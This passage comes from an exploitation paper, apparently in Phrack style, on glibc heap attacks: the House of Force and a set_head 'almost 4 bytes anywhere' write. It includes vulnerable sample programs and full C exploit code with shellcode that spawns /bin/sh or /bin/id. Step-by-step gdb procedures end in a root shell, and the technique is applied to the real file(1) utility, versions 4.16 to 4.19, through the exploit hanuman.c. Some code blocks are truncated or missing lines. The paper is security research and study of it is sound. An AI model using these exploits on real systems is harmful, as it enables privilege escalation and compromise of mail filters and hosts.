------[ 4.1.2 The "House of Force" technique

Minimum requirements:

        1. The size field of the topchunk must be overwritten with a very
           large value;

        2. Then, there must be a first call to malloc with a very large
           size.  An important point is that this same allocated buffer
           should only be freed after the third step.

        3. Finally, there should be a second call to malloc.  This buffer
           should then be filled with some user supplied data.

This technique will, in the best-case scenario, let you overwrite any
region in memory with a string of an arbitrary length that you control.

----[ 4.2 - Almost 4 bytes to almost anywhere technique

This set_head technique is not really a "write 4 arbitrary bytes anywhere
in memory" primitive.  There are some restrictions in malloc.c that greatly
limit the possible values an attacker can use for the return location and
the return address in an exploit.  Still, it's possible to run arbitrary
code if you carefully choose your values.

Below you will find the three main restrictions of this technique:

------[ 4.2.1 - Everything in life is a multiple of 8

A disadvantage of the set_head technique is the presence of macros that
ensure memory locations and values are a multiple of 8 bytes.  These macros

    - checked_request2size() and
    - chunksize()

Ultimately, this will have some influence on the selection of the return
location and the return address.

The memory addresses that you can overwrite with the set_head technique
need to be aligned on a 8 bytes boundary.  Interesting locations to
overwrite on the stack usually include a saved EIP of a stack frame or a
function pointer. These pointers are aligned on a 4 bytes boundary, so with
this technique, you will be able to modify one memory address on two.

The return address will also need to be a multiple of 8 (not counting the
logical OR with PREV_INUSE).  Normally, the attacker has the possibility of
providing a NOP cushion right before his shellcode, so this is not really a
big issue.

------[ 4.2.2 - Top chunk's size needs to be bigger than the requested
                malloc size

This is the main disadvantage of the set_head technique.  For the top chunk
code to be triggered and serve the memory request, there is a verification
before the top chunk code is executed:

        --[ From malloc.c

        if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {

In short, this line requires that the size of the top chunk is bigger than
the size requested by the malloc call.  Since the variable 'size' and 'nb'
are computed from the return location, the return address and the top
chunk's location, it will greatly limit the content and the location of the
arbitrary overwrite operation.  There is still a valid combination of a
return address and a return location that exists.

Let's see what the value of 'size' and 'nb' for a given return location and
return address will be.  Let's find out when there is a situation in which
'size' is greater than 'nb'.  Consider the fact that the location of the
top chunk is static and it's at 0x080614f8:

        |   return   |   return   ||    size    |     nb     |
        |  location  |   address  ||            |            |
        | 0x0804b150 | 0x08061000 ||  134523993 | 4294876240 |
        | 0x0804b150 | 0xbffffbaa || 3221133059 | 4294876240 |
        | 0xbffffaaa | 0xbffffbaa || 2012864861 | 3086607786 |
        | 0xbffffaaa | 0x08061000 || 3221222835 | 3086607786 | <- !!!!!

As you can see from this chart, the only time that you get a situation
where 'size' is greater than 'nb' is when your return location is somewhere
in the stack and when your return address is somewhere in the heap.

------[ 4.2.3 - Logical OR with PREV_INUSE

When the set_head macro is called, 'remainder_size', which is the return
address, will be altered by a logical OR with the flag PREV_INUSE:

        --[ From malloc.c

        #define PREV_INUSE 0x1

        set_head(remainder, remainder_size | PREV_INUSE);

It was said in section 4.2.1 that the return address will always be a
multiple of 8 bytes due to the normalisation of some macros.  With the
PREV_INUSE logical OR, it will be a multiple of 8 bytes, plus 1.  With an
NOP cushion, this problem is solved.  Compared to the previous two, this
restriction is a very small one.

--[ 5 - Taking set_head() to the next level

As a general rule, hackers try to make their exploit as reliable as
possible.  Exploiting a vulnerability in a confined lab and in the wild are
two different things.  This section will try to present some techniques to
improve the reliability of the set_head technique.

----[ 5.1 - Multiple overwrites

One way to make the exploitation process a lot more reliable is by using
multiple overwrites.  Indeed, having the possibility of overwriting a
memory location with 4 bytes is good, but the possibility to write multiple
times to memory is even better[8].  Being able to overwrite multiple memory
locations with set_head will increase your chance of finding a valid return
location on the stack.

A great advantage of the set_head technique is that it does not corrupt
internal malloc information in a way that prevents the program from working
properly.  This advantage will let you safely overwrite more than one
memory location.

To correctly put this technique in place, the attacker will need to start
overwriting addresses at the top of the stack, and go downward until he
seizes control of the program.  Here are the possible addresses that
set_head() lets you overwrite on the stack:

        1: 0xbffffffc
        2: 0xbffffff4
        3: 0xbfffffec
        4: 0xbfffffe4
        5: 0xbfffffdc
        6: 0xbfffffd4
        7: 0xbfffffcc
        8: 0xbfffffc4
        9: ...

Eventually, the attacker will fall on a memory location which is a saved
EIP in a stack frame.  If he's lucky enough, this new saved EIP will be
popped in the EIP register.

Remember that for a successfull overwrite, the attacker needs to do two

        1. Overwrite the top chunk with a specific value;
        2. Make a call to malloc with a specific value.

Based on the formulas that were found in section 3.3, let's compute the
values for the top chunk size and the size for the malloc call for each
overwrite operation.  Let's take the following values for an example case:

        The location of the top chunk:        0x08050100
        The return address:                   0x08050200
        The return location:                  Decrementing from 0xbffffffc
                                              to 0xbfffffc4

         |   return   || top chunk  |   malloc   |
         |  location  ||   size     |    size    |
         | 0xbffffffc || 3221225725 | 3086679796 |
         | 0xbffffff4 || 3221225717 | 3086679788 |
         | 0xbfffffec || 3221225709 | 3086679780 |
         | 0xbfffffe4 || 3221225701 | 3086679772 |
         | 0xbfffffdc || 3221225693 | 3086679764 |
         | 0xbfffffd4 || 3221225685 | 3086679756 |
         | 0xbfffffcc || 3221225677 | 3086679748 |
         | 0xbfffffc4 || 3221225669 | 3086679740 |
         |     ...    ||     ...    |     ...    |

By looking at this chart, you can determine that for each overwrite
operation, the attacker would need to overwrite the size of the top chunk
with a new value and make a call to malloc with an arbitrary value.  Would
it be possible to improve this a little bit?  It would be great if the only
thing you needed to change between each overwrite operation was the size of
the malloc call, leaving the size of the top chunk untouched.

Indeed, it's possible.  Look closely at the functions used to compute
malloc_size and topchunk_size.  Let's say the attacker has only one
possibility to overwrite the size of the top chunk, would it still be
possible to do multiple overwrites using the set_head technique while
keeping the same size for the top chunk?

        1. malloc_size = (retloc - toploc - 8)
        2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE

If you look at how 'topchunk_size' is computed, it seems possible.  By
changing the value of 'retloc', it will affect 'malloc_size'. Then,
'malloc_size' is used to compute 'topchunk_size'.  By playing with 'retadr'
in the second formula, you can always hit the same 'topchunk_size'.  Let's
look at the same example, but this time with a changing return address.
While the return location is decrementing by 8, let's increment the return
address by 8.

        |   return   |  return   || top chunk  |   malloc   |
        |  location  |  address  ||   size     |    size    |
        | 0xbffffffc | 0x8050200 || 3221225725 | 3086679796 |
        | 0xbffffff4 | 0x8050208 || 3221225725 | 3086679788 |
        | 0xbfffffec | 0x8050210 || 3221225725 | 3086679780 |
        | 0xbfffffe4 | 0x8050218 || 3221225725 | 3086679772 |
        | 0xbfffffdc | 0x8050220 || 3221225725 | 3086679764 |
        | 0xbfffffd4 | 0x8050228 || 3221225725 | 3086679756 |
        | 0xbfffffcc | 0x8050230 || 3221225725 | 3086679748 |
        | 0xbfffffc4 | 0x8050238 || 3221225725 | 3086679740 |
        |    ...     |    ...    ||     ...    |     ...    |

You can see that the size of the top chunk is always the same.  On the
other hand, the return address changes through the multiple overwrites.
The attacker needs to have an NOP cushion big enough to adapt to this

Refer to section to get a sample vulnerable scenario exploitable
with multiple overwrites.

----[ 5.2 - Infoleak

As was stated in the Shellcoder's Handbook[9]: "An information leak can
make even a difficult bug possible".  Most of the time, people who write
exploits try to make them as reliable as possible.  If hackers, using an
infoleak technique, can improve the reliability of the set_head technique,
well, that's pretty good.  The technique is already hard to use because it
relies on unknown memory locations, which are:

        - The return location
        - The top chunk location
        - The return address

When there is an overwrite operation, if the attacker is able to tell if
the program has crashed or not, he can turn this to his advantage.  Indeed,
this knowledge could help him find one parameter of the exploitable
situation, which is the top chunk location.

The theory behind this technique is simple.  If the attacker has the real
address of the top chunk, he will be able to write at the address
0xbffffffc but not at the address 0xc0000004.

Indeed, a write operation at the address 0xbffffffc will work because this
address is in the stack and its purpose is to store the environment
variables of the program.  It does not significantly affect the behaviour
of the program, so the program will still continue to run normally.

On the other hand, if the attacker wrote in memory starting from
0xc0000000, there will be a segmentation fault because this memory region
is not mapped.  After this violation, the program will crash.

To take advantage of this behaviour, the attacker will have to do a series
of write operations while incrementing or decrementing the location of the
top chunk.  For each top chunk location tried, there should be 6 write

Below, you will find the parameters of the exploitable situation to use
during the 6 write operations.  The expected result is in the right column
of the chart.  If you get these results, then the value used for the
location of the top chunk is the right one.

        |  return    |   return   ||    Did it    |
        |  location  |   address  ||   segfault ? |
        | 0xc0000014 | 0x07070707 ||     Yes      |
        | 0xc000000c | 0x07070707 ||     Yes      |
        | 0xc0000004 | 0x07070707 ||     Yes      |
        | 0xbffffffc | 0x07070707 ||     No       |
        | 0xbffffff4 | 0x07070707 ||     No       |
        | 0xbfffffec | 0x07070707 ||     No       |

If the six write operations made the program segfault each time, then the
attacker is probably writing after 0xbfffffff or below the limit of the

If the 6 write operations succeeded and the program did not crash, then it
probably means that the attacker overwrote some values in the stack.  In
that case, decrement the value of the top chunk location to use.

--[ 6 - Examples

The best way to learn something new is probably with the help of examples.
Below, you will find some vulnerable codes and their exploits.

A scenario-based approach is taken here to demonstrate the exploitability
of a situation.  Ultimately, the exploitability of a context can be defined
by specific characterictics.

Also, the application of the set_head() technique on a real life example is
shown with the file(1) utility vulnerability.  The set_head technique was
found to exploit this specific vulnerability.

----[ 6.1 - The basic scenarios

To simplify things, it's useful to define exploitable contexts in terms of
scenarios.  For each specific scenario, there should be a specific way to
exploit it.  Once the reader has learned those scenarios, he can then match
them with vulnerable situations in softwares.  He will then know exactly
what approach to use to make the most out of the vulnerability.

------[ - The most basic form of the set_head() technique

This scenario is the most basic form of the application of the set_head()
technique.  This is the approach that was used in the file(1) utility

--------------------------- scenario1.c -----------------------------------
        #include <stdio.h>
        #include <stdlib.h>

        int main (int argc, char *argv[]) {

                char *buffer1;
                char *buffer2;
                unsigned long size;

/* [1] */       buffer1 = (char *) malloc (1024);
/* [2] */       sprintf (buffer1, argv[1]);

                size = strtoul (argv[2], NULL, 10);

/* [3] */       buffer2 = (char *) malloc (size);

                return 0;
--------------------------- end of scenario1.c ----------------------------

Here is a brief description of the important lines in this code:

[1]: The top chunk is split and a memory region of 1024 bytes is requested.

[2]: A sprintf call is made.  The destination buffer is not checked to see
     if it is large enough.  The top chunk can then be overwritten here.

[3]: A call to malloc with a user-supplied size is done.

------[ - Exploit

--------------------------- exp1.c ----------------------------------------
   Exploit for scenario1.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// The following #define are from malloc.c and are used
// to compute the values for the malloc size and the top chunk size.
#define PREV_INUSE 0x1
#define SIZE_SZ (sizeof(size_t))
#define MIN_CHUNK_SIZE 16
#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \

struct sethead {
    unsigned long topchunk_size;
    unsigned long malloc_size;

/* linux_ia32_exec -  CMD=/bin/sh Size=68 Encoder=PexFnstenvSub */
unsigned char scode[] =

struct sethead * set_head_compute
    (unsigned long retloc, unsigned long retadr, unsigned long toploc) {

    unsigned long check_retloc, check_retadr;
    struct sethead *shead;

    shead = (struct sethead *) malloc (8);
    if (shead == NULL) {
        fprintf (stderr,
            "--[ Could not allocate memory for sethead structure\n");
        exit (1);

    if ( (toploc % 8) != 0 ) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the top chunk location.",

        toploc = toploc - (toploc % 8);
        fprintf (stderr, "  Using 0x%x instead\n", toploc);
    } else
        fprintf (stderr,
            "--[ Using 0x%x as the top chunk location.\n", toploc);

    // The minus 8 is to take care of the normalization
    // of the malloc parameter
    shead->malloc_size = (retloc - toploc - 8);

    // By adding the 8, we are able to sometimes perfectly hit
    // the return address.  To hit it perfectly, retadr must be a multiple
    // of 8 + 1 (for the PREV_INUSE flag).
    shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;

    if (shead->topchunk_size < shead->malloc_size) {
        fprintf (stderr,
            "--[ ERROR: topchunk size is less than malloc size.\n");
        fprintf (stderr, "--[ Topchunk code will not be triggered\n");
        exit (1);

    check_retloc = (toploc + request2size (shead->malloc_size) + 4);
    if (check_retloc != retloc) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return location. ", retloc);
        fprintf (stderr, "Using 0x%x instead\n", check_retloc);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return location.\n",

    check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
        - request2size (shead->malloc_size)) | PREV_INUSE;
    if (check_retadr != retadr) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return address.", retadr);
        fprintf (stderr, " Using 0x%x instead\n", check_retadr);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return address.\n",

    return shead;

put_byte (char *ptr, unsigned char data) {
    *ptr = data;

put_longword (char *ptr, unsigned long data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
    put_byte (ptr + 2, data >> 16);
    put_byte (ptr + 3, data >> 24);

int main (int argc, char *argv[]) {

        char *buffer;
        char malloc_size_string[20];
        unsigned long retloc, retadr, toploc;
        unsigned long topchunk_size, malloc_size;
        struct sethead *shead;

        if ( argc != 4) {
                printf ("wrong number of arguments, exiting...\n\n");
                printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
                return 1;

        sscanf (argv[1], "0x%x", &retloc);
        sscanf (argv[2], "0x%x", &retadr);
        sscanf (argv[3], "0x%x", &toploc);

        shead = set_head_compute (retloc, retadr, toploc);
        topchunk_size = shead->topchunk_size;
        malloc_size = shead->malloc_size;

        buffer = (char *) malloc (1036);

        memset (buffer, 0x90, 1036);
        put_longword (buffer+1028, topchunk_size);
        memcpy (buffer+1028-strlen(scode), scode, strlen (scode));

        snprintf (malloc_size_string, 20, "%u", malloc_size);
        execl ("./scenario1", "scenario1", buffer, malloc_size_string,

        return 0;
--------------------------- end of exp1.c ---------------------------------

Here are the steps to find the 3 memory values to use for this exploit.

1- The first step is to generate a core dump file from the vulnerable
program.  You will then have to analyze this core dump to find the proper
values for your exploit.

To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section.  Normally, the heap will
start just after the BSS section:

bash$ readelf -S ./scenario1 | grep bss
  [22] .bss              NOBITS          080495e4 0005e4 000004

The BSS section starts at 0x080495e4.  Let's call the exploit the following
way, and remember to replace 0x080495e4 for the BSS value you have found:

bash$ ./exp1 0xc0c0c0c0 0x080495e4 0x080495e4
--[ Impossible to use 0x80495e4 as the top chunk location.  Using 0x80495e0
--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
--[ Impossible to use 0x80495e4 as the return address. Using 0x80495e1
Segmentation fault (core dumped)

2- Call gdb on that core dump file.

bash$ gdb -q scenario1 core.2212
Core was generated by `scenario1'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/debug/
Loaded symbols for /usr/lib/debug/
Reading symbols from /lib/
Loaded symbols for /lib/
#0  _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082

4082          set_head(remainder, remainder_size | PREV_INUSE);

3- The ESI register contains the address of the top chunk.  It might be
another register for you.

(gdb) info reg esi
esi            0x8049a38        134519352

4- Start searching before the location of the top chunk to find the NOP
cushion.  This will be the return address.

0x8049970:      0x90909090      0x90909090      0x90909090      0x90909090
0x8049980:      0x90909090      0x90909090      0x90909090      0x90909090
0x8049990:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499a0:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499b0:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499c0:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499d0:      0x90909090      0x90909090      0x90909090      0x90909090
0x80499e0:      0x90909090      0x90909090      0x90909090      0xe983c931
0x80499f0:      0xd9eed9f5      0x5bf42474      0x27137381      0x83b3c0e2
0x8049a00:      0xf4e2fceb      0x2a98e94d      0x9ea88475      0xdb276b44

0x8049990 is a valid address.

5- To get the return location for your exploit, get a saved EIP from a
stack frame.

(gdb) frame 2
#2  0x0804840a in main ()
(gdb) x $ebp+4
0xbffff52c:     0x4002980c

0xbffff52c is the return location.

6- You can now call the exploit with the values that you have found.

bash$ ./exp1 0xbffff52c 0x8049990 0x8049a38
--[ Using 0x8049a38 as the top chunk location.
--[ Using 0xbffff52c as the return location.
--[ Impossible to use 0x8049990 as the return address. Using 0x8049991
sh-2.05b# exit

------[ - Multiple overwrites

This scenario is an example of a situation where it could be possible to
leverage the set_head() technique to make it write multiple times in
memory.  Applying this technique will help you improve the reliability of
the exploit.  It will increase your chances of finding a valid return
location while you are exploiting the program.

--------------------------- scenario2.c -----------------------------------
        #include <stdio.h>
        #include <stdlib.h>
        #include <unistd.h>

        int main (int argc, char *argv[]) {

                char *buffer1;
                char *buffer2;
                unsigned long size;

/* [1] */       buffer1 = (char *) malloc (4096);
/* [2] */       fgets (buffer1, 4200, stdin);

/* [3] */       do {
                        size = 0;
                        scanf ("%u", &size);
/* [4] */               buffer2 = (char *) malloc (size);

                         * Random code

/* [5] */               free (buffer2);

                } while (size != 0);

                return 0;
------------------------- end of scenario2.c ------------------------------

Here is a brief description of the important lines in this code:

[1]: A memory region of 4096 bytes is requested.  The top chunk is split
     and the request is serviced.

[2]: A call to fgets is made.  The destination buffer is not checked to see
     if it is large enough.  The top chunk can then be overwritten here.

[3]: The program enters a loop.  It reads from 'stdin' until the number '0'
     is entered.

[4]: A call to malloc is done with 'size' as the parameter.  The loop does
     not end until size equals '0'.  This gives the attacker the
     possibility of overwriting the memory multiple times.

[5]: The buffer needs to be freed at the end of the loop.

------[ - Exploit

--------------------------- exp2.c ----------------------------------------
   Exploit for scenario2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// The following #define are from malloc.c and are used
// to compute the values for the malloc size and the top chunk size.
#define PREV_INUSE 0x1
#define SIZE_SZ (sizeof(size_t))
#define MIN_CHUNK_SIZE 16
#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \

struct sethead {
    unsigned long topchunk_size;
    unsigned long malloc_size;

/* linux_ia32_exec -  CMD=/bin/id Size=68 Encoder=PexFnstenvSub */
unsigned char scode[] =

struct sethead * set_head_compute
    (unsigned long retloc, unsigned long retadr, unsigned long toploc) {

    unsigned long check_retloc, check_retadr;
    struct sethead *shead;

    shead = (struct sethead *) malloc (8);
    if (shead == NULL) {
        fprintf (stderr,
            "--[ Could not allocate memory for sethead structure\n");
        exit (1);

    if ( (toploc % 8) != 0 ) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the top chunk location.",

        toploc = toploc - (toploc % 8);
        fprintf (stderr, "  Using 0x%x instead\n", toploc);
    } else
        fprintf (stderr,
            "--[ Using 0x%x as the top chunk location.\n", toploc);

    // The minus 8 is to take care of the normalization
    // of the malloc parameter
    shead->malloc_size = (retloc - toploc - 8);

    // By adding the 8, we are able to sometimes perfectly hit
    // the return address.  To hit it perfectly, retadr must be a multiple
    // of 8 + 1 (for the PREV_INUSE flag).
    shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;

    if (shead->topchunk_size < shead->malloc_size) {
        fprintf (stderr,
            "--[ ERROR: topchunk size is less than malloc size.\n");
        fprintf (stderr, "--[ Topchunk code will not be triggered\n");
        exit (1);

    check_retloc = (toploc + request2size (shead->malloc_size) + 4);
    if (check_retloc != retloc) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return location. ", retloc);
        fprintf (stderr, "Using 0x%x instead\n", check_retloc);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return location.\n",

    check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
        - request2size (shead->malloc_size)) | PREV_INUSE;
    if (check_retadr != retadr) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return address.", retadr);
        fprintf (stderr, " Using 0x%x instead\n", check_retadr);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return address.\n",

    return shead;

put_byte (char *ptr, unsigned char data) {
    *ptr = data;

put_longword (char *ptr, unsigned long data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
    put_byte (ptr + 2, data >> 16);
    put_byte (ptr + 3, data >> 24);

int main (int argc, char *argv[]) {

        char *buffer;
        char malloc_size_buffer[20];
        unsigned long retloc, retadr, toploc;
        unsigned long topchunk_size, malloc_size;
        struct sethead *shead;
        int i;

        if ( argc != 4) {
                printf ("wrong number of arguments, exiting...\n\n");
                printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
                return 1;

        sscanf (argv[1], "0x%x", &retloc);
        sscanf (argv[2], "0x%x", &retadr);
        sscanf (argv[3], "0x%x", &toploc);

        shead = set_head_compute (retloc, retadr, toploc);
        topchunk_size = shead->topchunk_size;
        free (shead);

        buffer = (char *) malloc (4108);
        memset (buffer, 0x90, 4108);
        put_longword (buffer+4100, topchunk_size);
        memcpy (buffer+4100-strlen(scode), scode, strlen (scode));

        printf ("%s\n", buffer);

        for (i = 0; i < 300; i++) {
                shead = set_head_compute (retloc, retadr, toploc);
                topchunk_size = shead->topchunk_size;
                malloc_size = shead->malloc_size;

                printf ("%u\n", malloc_size);

                retloc = retloc - 8;
                retadr = retadr + 8;

                free (shead);

        return 0;
--------------------------- end of exp2.c ---------------------------------

Here are the steps to find the memory values to use for this exploit.

1- The first step is to generate a core dump file from the vulnerable
program.  You will then have to analyze this core dump to find the proper
values for your exploit.

To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section.  Normally, the heap will
start just after the BSS section:

bash$ readelf -S ./scenario2|grep bss
  [22] .bss              NOBITS          0804964c 00064c 000008

The BSS section starts at 0x0804964c.  Let's call the exploit the following
way, and remember to replace 0x0804964c for the BSS value you have found:

bash$ ./exp2 0xc0c0c0c0 0x0804964c 0x0804964c | ./scenario2
--[ Impossible to use 0x804964c as the top chunk location.  Using 0x8049648
--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
--[ Impossible to use 0x804964c as the return address. Using 0x8049649
--[ Impossible to use 0x804964c as the top chunk location.  Using 0x8049648
--[ Impossible to use 0xc0c0b768 as the return location. Using 0xc0c0b76c
--[ Impossible to use 0x8049fa4 as the return address. Using 0x8049fa1
Segmentation fault (core dumped)

2- Call gdb on that core dump file.

bash$ gdb -q scenario2 core.2698
Core was generated by `./scenario2'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/debug/
Loaded symbols for /usr/lib/debug/
Reading symbols from /lib/
Loaded symbols for /lib/
#0  _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082

4082          set_head(remainder, remainder_size | PREV_INUSE);

3- The ESI register contains the address of the top chunk.  It might be
another register for you.

(gdb) info reg esi
esi            0x804a6a8        134522536

4- For the return address, get a memory address at the beginning of the NOP

0x8049654:      0x00000000      0x00000000      0x00000019      0x4013e698
0x8049664:      0x4013e698      0x400898a0      0x4013d720      0x00000000
0x8049674:      0x00000019      0x4013e6a0      0x4013e6a0      0x400899b0
0x8049684:      0x4013d720      0x00000000      0x00000019      0x4013e6a8
0x8049694:      0x4013e6a8      0x40089a80      0x4013d720      0x00000000
0x80496a4:      0x00001009      0x90909090      0x90909090      0x90909090
0x80496b4:      0x90909090      0x90909090      0x90909090      0x90909090
0x80496c4:      0x90909090      0x90909090      0x90909090      0x90909090
0x80496d4:      0x90909090      0x90909090      0x90909090      0x90909090

0x80496b4 is a valid address.

5- You can now call the exploit with the values that you have found.  The
return location will be 0xbffffffc, and it will decrement with each write.
The shellcode in exp2.c executes /bin/id.

bash$ ./exp2 0xbffffffc 0x80496b4 0x804a6a8 | ./scenario2
--[ Using 0x804a6a8 as the top chunk location.
--[ Using 0xbffffffc as the return location.
--[ Impossible to use 0x80496b4 as the return address. Using 0x80496b9
--[ Using 0xbffff6a4 as the return location.
--[ Impossible to use 0x804a00c as the return address. Using 0x804a011
uid=0(root) gid=0(root) groups=0(root)

----[ 6.2 - A real case scenario: file(1) utility

The set_head technique was developed during the research of a security hole
in the UNIX file(1) utility.  This utility is an automatic file content
type recognition tool found on many UNIX systems.  The versions affected
are Ian Darwin's version 4.00 to 4.19, maintained by Christos Zoulas.  This
version is the standard version of file(1) for Linux, *BSD, and other
systems, maintained by Christos Zoulas.

The main reason why so much energy was put in the development of this
exploit is mainly because the presence of a vulnerability in this utility
represents a high security risk for an SMTP content filter.

An SMTP content filter is a system that acts after the SMTP server receives
email and applies various filtering policies defined by a network
administrator.  Once the scanning process is finished, the filter decides
whether the message will be relayed or not.

An SMTP content filter needs to be able to call different kind of programs
on an incoming email:

        - Dearchivers;
        - Decoders;
        - Classifiers;
        - Antivirus;
        - and many more ...

The file(1) utility falls under the "classifiers" category.

This attack vector gives a complete new meaning to vulnerabilities that
were classified as low risk.

The author of this paper is also the maintainer of PIRANA [7], an
exploitation framework that tests the security of an email content filter.
By means of a vulnerability database, the content filter to be tested will
be bombarded by various emails containing a malicious payload intended to
compromise the computing platform.  PIRANA's goal is to test whether or not
any vulnerability exists on the content filtering platform.

------[ 6.2.1 - The hole

The security vulnerability is in the file_printf() function.  This function
fills the content of the 'ms->o.buf' buffer with the characteristics of the
inspected file.  Once this is done, the buffer is printed on the screen,
showing what type of file was detected.  Here is the vulnerable function:

--[ From file-4.19/src/funcs.c

01 protected int
02 file_printf(struct magic_set *ms, const char *fmt, ...)
03 {
04         va_list ap;
05         size_t len;
06         char *buf;
08         va_start(ap, fmt);
09         if ((len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap)) >= ms->
o.len) {
10                 va_end(ap);
11                 if ((buf = realloc(ms->o.buf, len + 1024)) == NULL) {
12                         file_oomem(ms, len + 1024);
13                         return -1;
14                 }
15                 ms->o.ptr = buf + (ms->o.ptr - ms->o.buf);
16                 ms->o.buf = buf;
17                 ms->o.len = ms->o.size - (ms->o.ptr - ms->o.buf);
18                 ms->o.size = len + 1024;
20                 va_start(ap, fmt);
21                 len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap);
22         }
23         ms->o.ptr += len;
24         ms->o.len -= len;
25         va_end(ap);
26         return 0;
27 }

At first sight, this function seems to take good care of not overflowing
the 'ms->o.ptr' buffer.  A first copy is done at line 09.  If the
destination buffer, 'ms->o.buf', is not big enough to receive the character
string, the memory region is reallocated.

The reallocation is done at line 11, but the new size is not computed
properly.  Indeed, the function assumes that the buffer should never be
bigger than 1024 added to the current length of the processed string.

The real problem is at line 21.  The variable 'ms->o.len' represents the
number of bytes left in 'ms->o.buf'.  The variable 'len', on the other
hand, represents the  number  of  characters (not  including the trailing
'\0') which would have been written to the final string if enough space had
been available.  In the event that the buffer to be printed would be larger
than 'ms->o.len', 'len' would contain a value greater than 'ms->o.len'.
Then, at line 24, 'len' would get subtracted from 'ms->o.len'.  'ms->o.len'
could underflow below 0, and it would become a very big positive integer
because 'ms->o.len' is of type 'size_t'.  Subsequent vsnprintf() calls
would then receive a very big length parameter thus rendering any bound
checking capabilities useless.

------[ 6.2.2 - All the pieces fall into place

There is an interesting portion of code in the function donote()/readelf.c.
There is a call to the vulnerable function, file_printf(), with a
user-supplied buffer.  By taking advantage of this code, it will be a lot
simpler to write a successful exploit.  Indeed, it will be possible to
overwrite the chunk information with arbitrary values.

        --[ From file-4.19/src/readelf.c

           * Extract the program name.  It is at
           * offset 0x7c, and is up to 32-bytes,
           * including the terminating NUL.
          if (file_printf(ms, ", from '%.31s'",
              &nbuf[doff + 0x7c]) == -1)
                  return size;

After a couple of tries overflowing the header of the next chunk, it was
clear that the only thing that was overflowable was the wilderness chunk.
It was not possible to provoke a situation where a chunk that was not
adjacent to the top chunk could be overflowable with user controllable

The file utility suffers from this buffer overflow since the 4.00 release
when the first version of file_printf() was introduced.  A successful
exploitation was only possible starting from version 4.16.  Indeed, this
version included a call to malloc with a user controllable variable.  From

        --[ From file-4.19/src/readelf.c

          if ((nbuf = malloc((size_t)xsh_size)) == NULL) {
           file_error(ms, errno, "Cannot allocate memory"
               " for note");
           return -1;

This was the missing piece of the puzzle.  Now, every condition is met to
use the set_head() technique.

------[ 6.2.3 - hanuman.c

 * hanuman.c
 * file(1) exploit for version 4.16 to 4.19.
 * Coded by Jean-Sebastien Guay-Leroux


Here are the steps to find the 3 memory values to use for the file(1)

1- The first step is to generate a core dump file from file(1).  You will
then have to analyze this core dump to find the proper values for your

To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section:

bash# readelf -S /usr/bin/file

Section Headers:
  [Nr] Name              Type            Addr
  [ 0]                   NULL            00000000
  [ 1] .interp           PROGBITS        080480f4
  [22] .bss              NOBITS          0804b1e0

The BSS section starts at 0x0804b1e0.  Let's call the exploit the following
way, and remember to replace 0x0804b1e0 for the BSS value you have found:

bash# ./hanuman 0xc0c0c0c0 0x0804b1e0 0x0804b1e0 mal
--[ Using 0x804b1e0 as the top chunk location.
--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
--[ Impossible to use 0x804b1e0 as the return address. Using 0x804b1e1
--[ The file has been written
bash# file mal
Segmentation fault (core dumped)

2- Call gdb on that core dump file.

bash# gdb -q file core.14854
Core was generated by `file mal'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/local/lib/
Loaded symbols for /usr/local/lib/
Reading symbols from /lib/i686/
Loaded symbols for /lib/i686/
Reading symbols from /lib/
Loaded symbols for /lib/
Reading symbols from /usr/lib/gconv/
Loaded symbols for /usr/lib/gconv/
#0  0x400a3d15 in mallopt () from /lib/i686/

3- The EAX register contains the address of the top chunk.  It might be
another register for you.

(gdb) info reg eax
eax            0x80614f8        134616312

4- Start searching from the location of the top chunk to find the NOP
cushion.  This will be the return address.

0x80614f8:      0xc0c0c0c1      0xb8bc0ee1      0xc0c0c0c1      0xc0c0c0c1
0x8061508:      0xc0c0c0c1      0xc0c0c0c1      0x73282027      0x616e6769
0x8061518:      0x2930206c      0x90909000      0x90909090      0x90909090
0x8061528:      0x90909090      0x90909090      0x90909090      0x90909090
